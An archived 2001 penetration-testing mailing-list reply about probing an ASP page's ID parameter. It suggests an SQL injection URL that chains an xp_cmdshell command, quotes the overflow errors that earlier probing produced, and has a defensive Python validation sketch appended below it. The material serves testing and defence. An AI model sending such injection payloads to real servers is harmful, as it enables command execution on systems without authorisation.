Penetration Testing mailing list archives

Re: ASP code testing


From: "rudi carell" <rudicarell () hotmail com>
Date: Mon, 19 Nov 2001 08:11:52



Hi Dan,

If the application (not the DB!) does not check for a valid number (int),
I'd recommend appending a second statement, something like:

---cut here---

http://server/showsomething.asp?
ID=5['|"|<nothing>];exec+master%2e%2exp_cmdshell+%22dir+c:\%22;--%00

---cut here---

If not, go for the next input field ...


rc


http://www.asite.com/show/showsomething.asp?ID=5
Will retrieve a legitimate item from the database. By playing with the
number a bit - http://www.asite.com/show/showsomething.asp?ID=32767

Will generate

ADODB.Field error '80020009'

Either BOF or EOF is True, or the current record has been deleted.
Requested operation requires a current record.

But if I bump that number up to 32768 (unsigned integer limit)-

Microsoft VBScript runtime error '800a0006'

Overflow: 'cint'



rc

security () freefly com
http://www.freefly.com/security/
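
Both probes in this thread (a second statement appended to `ID`, and `ID=32768` overflowing `CInt`) depend on the page using the raw query-string value. As an added example, not part of the original post or of the application discussed, here is a Python sketch of the server-side check that is missing; the `items` table, the function names and the positive-ID rule are assumptions.

```python
import re
import sqlite3
from urllib.parse import unquote_plus

# VBScript CInt only holds a signed 16-bit value; anything above 32767
# produces the "Overflow: 'cint'" error quoted in the thread.
CINT_MAX = 32767
# ASCII digits only: \d would also accept non-ASCII digits, and fullmatch()
# (unlike "$") rejects a trailing newline.
_DIGITS = re.compile(r"[0-9]{1,5}")

def parse_id(raw):
    """Return the ID as an int, or None when the value must be rejected."""
    if not isinstance(raw, str) or not _DIGITS.fullmatch(raw):
        return None
    value = int(raw)
    # Assumption: item IDs are positive and fit the CInt range.
    return value if 1 <= value <= CINT_MAX else None

def show_item(conn, raw_id):
    """Return (status, body) without ever building SQL from the raw input."""
    item_id = parse_id(raw_id)
    if item_id is None:
        return 400, "invalid ID"  # generic message, no runtime error text
    row = conn.execute("SELECT name FROM items WHERE id = ?", (item_id,)).fetchone()
    return (200, row[0]) if row else (404, "no such item")

def demo():
    # Constructed data: a one-row table standing in for the real database.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE items (id INTEGER PRIMARY KEY, name TEXT)")
    conn.execute("INSERT INTO items VALUES (5, 'widget')")
    # Query-string values as sent; the last one is the string from the post
    # (its <nothing> variant), decoded here the way the web server would.
    sent = ["5", "32767", "32768", "",
            "5;exec+master%2e%2exp_cmdshell+%22dir+c:\\%22;--%00"]
    return [(s, show_item(conn, unquote_plus(s))) for s in sent]

if __name__ == "__main__":
    for sent, result in demo():
        print(repr(sent), "->", result)
```

A tester who gets the same generic 400 for `32768` and for the appended statement learns nothing about the runtime or the query, which is the difference from the two error messages quoted above.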
















----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/

